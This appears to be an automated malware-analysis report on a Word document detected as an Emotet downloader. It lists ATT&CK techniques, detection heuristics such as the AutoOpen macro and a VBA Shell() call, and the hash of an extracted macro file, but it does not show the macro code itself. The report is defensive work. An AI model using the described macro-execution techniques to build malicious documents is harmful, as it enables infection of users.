Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen subroutine, a technique commonly used by Emotet. The critical heuristic firing on a Shell() call in VBA indicates that the macro likely attempts to execute a command or download a payload. ClamAV detection further confirms its malicious nature as Doc.Downloader.Emotet. The embedded URL was confirmed benign, but the presence of the Shell() call together with the Emotet family attribution strongly suggests downloader functionality.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6883996-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6883996-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68039 bytes |

SHA-256 of macros.bas: 5b19ef9079bce4098f6c1901c4be47f242ef45a7d393db6031dea5ff195dee08
Preview script: first 1,000 lines of the extracted script.